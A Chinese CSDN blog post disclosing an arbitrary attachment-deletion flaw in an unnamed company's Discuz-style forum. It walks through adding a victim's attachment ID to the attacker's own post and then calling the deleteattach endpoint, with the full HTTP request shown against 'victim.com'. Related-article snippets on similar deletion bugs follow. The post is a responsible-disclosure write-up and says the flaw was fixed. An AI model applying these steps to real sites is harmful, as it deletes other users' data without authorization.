某企的任意用户附件删除漏洞

最新推荐文章于 2024-03-29 21:13:52 发布
最新推荐文章于 2024-03-29 21:13:52 发布
阅读量5.2k 收藏 3
点赞数 3
分类专栏: 安全 文章标签: 安全漏洞 信息安全 1024程序员节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34101364/article/details/107445107
版权

用户1:5wimming(受害者)

用户2:555232(攻击者)

先查看用户1附件的id,默认会显示在网页上,也可以通过右侧代码查找,这里6666是一张图片,id为4779620。
在这里插入图片描述

然后用户2随便发一个回复,然后保存。
在这里插入图片描述

然后点击上图中右下角的编辑按钮,进去后不用更改内容,点击保存并抓包,有两处地方需要修改,即将别人的附件加进去
在这里插入图片描述
如下图,已经将别人的附件加进来了
在这里插入图片描述

然后抓取删除附件的接口,删除id为4779620的附件。

GET /forum.php?mod=ajax&action=deleteattach&inajax=yes&tid=1773941&pid=62711467&aids[]=4779620 HTTP/1.1
Host: victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie:

发现用户2和用户1的附件都被删除了
在这里插入图片描述
该洞发现后,也是第一时间提交给了该企,目前该洞已改。

5wimming
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Wordpress4.9.6 任意文件删除漏洞复现分析
微赚淘客系统开发者博客
01-27 1132
第一章 漏洞简介及危害分析 1.1漏洞介绍 WordPress可以说是当今最受欢迎的(我想说没有之一)基于PHP的开源CMS,其目前的全球用户高达数百万,并拥有超过4600万次的超高下载量。它是一个开源的系统,其次它的功能也十分强大,源代码可以在这里找到。也正因为此,WordPress也成了众多黑客的攻击目标,一旦得手也就意味着数百万用户的沦陷。这种广泛的采用使其成为网络犯罪分子的一个有趣目标...
Discuz! X3.4 繁体中文-PHP
06-20
开启内存缓存时,forum_forumfield 表没被缓存导致的主题分类消失、版块规则消失、访问权限无效等问题20、删除用户无法删除 用户记录表(home_doing)数据21、修复 默认关闭非安全请求升级,保证HTTP外域资源正常显示...
微擎上传php木马,微擎1.5.4任意用户删除漏洞display.ctrl.php
weixin_36334284的博客
03-11 435
标题:微擎1.5.4任意用户删除漏洞描述:代码权限控制存在漏洞导致攻击者可任意删除用户。文件:/web/source/founder/display.ctrl.php漏洞修复方法:找到改行代码:$founders = explode(',', $_W['config']['setting']['founder']);在改行代码后面增加一段代码:$identity = uni_permission(...
阿里云提示微擎 代码权限控制存在漏洞导致攻击者可任意删除用户 解决办法
风火纶回
01-14 3506
漏洞名:weiqin-founder_display.ctrl.php-vul 漏洞路径:/web/source/founder/display.ctrl.php 描述:代码权限控制存在漏洞导致攻击者可任意删除用户漏洞修复方法: 代码约在14行: $founders = explode(',', $_W['config']['setting']['founder']); 在这行代码后面增加一...
微擎1.5.4任意用户删除漏洞涉及文件web/source/founder/display.ctrl.php
zalan01408980的博客
04-15 1021
阿里云盾提示,微擎1.5.4任意用户删除漏洞,代码权限控制存在漏洞导致攻击者可任意删除用户。 涉及文件 web/source/founder/display.ctrl.php 修复方案 查找一下代码 $founders = explode(',', $_W['config']['setting']['founder']); 在以上代码下面增加如下代码 $identity = u...
php任意文件删除漏洞,wordpress官方公布的任意文件删除漏洞修复方法
weixin_33019705的博客
04-02 362
摘要:前些时候,RIPS团队公开了wordpress 4.9.6以及4.9.6之前版本存在的任意文件删除漏洞,通过该wordp...前些时候,RIPS团队公开了wordpress 4.9.6以及4.9.6之前版本存在的任意文件删除漏洞,通过该wordpress漏洞,有登录权有上传附件权限的用户可以随意删除网站里面的任意的文件,该漏洞在4.9.7版本被修复,如果正在使用wordpress 4.9.7...
php任意文件删除漏洞,WordPress任意文件删除漏洞修复方法
weixin_39613839的博客
04-02 295
RIPS团队公开了wordpress 4.9.6以及4.9.6之前版本存在的任意文件删除漏洞,通过该漏洞,具有登录上传附件权限的用户可以删除网站上任意的文件,该漏洞在4.9.7版本被修复,如果正在使用wordpress 4.9.7以下版本的用户可以更新到最新版本修复该漏洞,不想更新的站长可以通过下面的方法修复。漏洞原理与危害由于WordPress文件wp-includes/post.php中的函数...
php任意文件删除漏洞,myblog/phpyun4.3任意文件删除漏洞.md at master · source-trace/myblog · GitHub...
weixin_32629285的博客
04-02 350
phpyun-expect.class.php任意文件漏洞信息公开时间: 2017/08影响版本: 4.3利用难度: 2挖掘难度: 2漏洞说明漏洞出现的原因是在于没有对数据进行很好的校验,可以直接插入其他文件的路径。同时在进行数据更新时,没有进行任何的检查,会直接删除对应路径。这样就导致了任意文件删除漏洞了。漏洞分析漏洞文件是phpyun/uploads/member/user/model/exp...
任意文件上传下载漏洞原理及示例
最新发布
m0_62480631的博客
03-29 969
许多web应用程序因业务需要,提供文件下载功能,但是没有对用户下载的文件做限制,导致恶意用户能够下载敏感文件。
【WEB漏洞原理】任意文件上传漏洞
过期的秋刀鱼
08-29 1918
文件上传是web应用必备功能之一,如:头像上传,附件分享登,如果服务器配置不当或者 没有进行足够的过滤,Web用户就可以上传任意文件,包括恶意脚本文件,exe 程序等等,这就造成了任意文件上传漏洞
MyuCMS社区+商城内容管理系统-PHP
06-21
可自定义任意页面为首页 配置附件上传到七牛。 bbs首页是否设置显示为瀑布流。 网站调试开启关闭。 发帖审核。 编辑器复制内容是否粘贴过滤。 可关闭论坛状态 。 可关闭商城状态(两个不能同时关闭)。 然后就是前端...
Art2008 CMS 网站管理系统 v3.1.rar
07-05
16、强化在线编辑器(采用ewebeditor在线编辑器),可视化编辑器,类似word的所件即所得的在线内容编辑功能,支持表格、图片、FLASH、多种格式播放器插入,支持图片和附件上传。 17、字符过滤,自动过滤敏感字符,...
发货100虚拟商品自动发货系统-PHP
06-20
1.修复:修复了一个文件任意读取漏洞[高危] 2.优化:商品模块接入进货价功能,方便站长统计销售及利润 3.优化:后台模板管理页面增加了代码运行允许时长,防止网速慢造成下载失败 发货100虚拟商品自动发货系统 v1.1 ...
五指CMS 4.1.0 UTF-8.zip
05-25
五指CMS是一款高性能的内容...* 修复:下载漏洞,可下载任意文件;* 新增:mysql类可以多次初始化,并传递不同的mysql配置;* 修复:登录无法调整到之前页面;* 优化:模版中删除多余调试代码;* 新增:内容页关键词链接。
spf、dkim、dmarc介绍与邮件伪造研究
热门推荐
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
08-18 1万+
文章目录spf、dkim、dmarc介绍SPFDKIMDMARC测试工具Swaks spf、dkim、dmarc介绍 SPF SPF(Sender Policy Framework)发件人策略框架 SPF 是为了防范伪造发件人地址发送垃圾邮件而提出的一种开放式标准,是一种以 IP 地址认证电子邮件发件人身份的技术。域名所有者通过在 DNS 中发布 SPF 记录来授权合法使用该域名发送邮件的 IP 地址。 当在 DNS 中定义了域名的 SPF 记录后,为了确认邮件声称发件人不是伪造的,邮件接收方首先检查邮件域
手机app逆向、渗透测试基础工具介绍
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
03-15 7653
手机app逆向基础工具介绍1、夜神模拟器2、Androidkiller3、burpsuite 本文介绍了三款手机软件逆向工具: 模拟器:夜神模拟器 apk编辑器:Androidkiller 代理抓包器:burpsuite 1、夜神模拟器 夜神模拟器是一款可以在mac或者windows上运行的模拟器,用于运行手机软件。 下载地址:https://www.yeshen.com/ 下载后安装即可。...
使用burpsuite对安卓软件进行抓包
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
04-01 6720
目录一、burpsuite设置二、模拟器设置三、安装证书四、愉快的抓包 相关资源下载参考:https://blog.csdn.net/qq_34101364/article/details/104883675 一、burpsuite设置 安装教程:https://blog.csdn.net/LUOBIKUN/article/details/87457545 打开burpsuite,按如下步骤操作,...
Liferay Portal CVE-2020-7961
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
05-06 6348
一、产品介绍 Liferay(又称Liferay Portal)是一个开源门户项目,该项目包含了一个完整的J2EE应用。该项目使用了Web、EJB以及JMS等技术,特别是其前台界面部分使用Struts 框架技术,基于XML的portlet配置文件可以自由地动态扩展,使用了Web Services来支持一些远程信息的获取,使用 Apache Lucene实现全文检索功能。 二、漏洞...
konga任意用户登录漏洞
10-10
对不起,我无法提供关于Konga网站的任意用户登录漏洞。我是一个AI助手,致力于提供有用的技术和信息,但我不能参与或支持任何非法活动或违反隐私和安全的行为。 如果您在使用Konga网站时遇到任何安全问题或漏洞,我...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值